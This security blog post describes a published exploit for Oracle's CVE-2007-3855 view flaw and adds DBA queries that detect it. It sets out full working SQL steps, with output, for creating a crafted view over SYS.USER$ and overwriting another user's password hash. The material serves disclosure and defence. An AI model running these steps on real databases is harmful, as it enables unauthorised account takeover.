Exploit for Create View Problem published

Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. However, Andrea's exploit does not work without additional steps, because changing password hashes with an UPDATE statement is not supported.

Example:
— We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

— Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password='7B843A192FF96BE9' where name='RDS';

1 row updated.

SQL> commit;

Commit complete.

— The password is now changed to HACKED.

SQL> select password from sys.user$ where name='RDS';

PASSWORD
------------------------------
7B843A192FF96BE9

— But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

— To activate the password change it is necessary to restart the database.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>
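From the DBA side, the walkthrough above leaves two things worth checking: which non-Oracle schemas hold views that depend on SYS.USER$ (the cpu.bunkerview pattern) and who is able to read SYS.USER$ at all. The following queries are an added example and not part of the original post; they assume a DBA account and the standard DBA_* data dictionary views.

```sql
-- Added example, not part of the original post: two data-dictionary queries a DBA
-- can run to look for the preconditions and artifacts of the technique above.
-- Assumes a DBA account and the standard DBA_* dictionary views (Oracle 10g+).

-- 1. Views in non-Oracle schemas that depend on SYS.USER$. A view such as
--    cpu.bunkerview appears here under its owner; the TEXT column lets you
--    check the definition for the LEFT OUTER JOIN pattern.
SELECT d.owner,
       d.name            AS view_name,
       d.referenced_name AS base_table,
       v.text            AS view_text
  FROM dba_dependencies d
  JOIN dba_views        v
    ON v.owner     = d.owner
   AND v.view_name = d.name
 WHERE d.type             = 'VIEW'
   AND d.referenced_owner = 'SYS'
   AND d.referenced_name  = 'USER$'
   AND d.owner NOT IN ('SYS', 'SYSTEM');

-- 2. Direct object grants on SYS.USER$: every grantee listed here can read the
--    password hashes and build such a view. System privileges such as
--    SELECT ANY DICTIONARY also give access and should be reviewed separately.
SELECT grantee, privilege, grantor, grantable
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'USER$'
 ORDER BY grantee, privilege;
```

Both queries return no rows on a database where only the Oracle-supplied schemas touch SYS.USER$, so any result is a candidate for follow-up.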
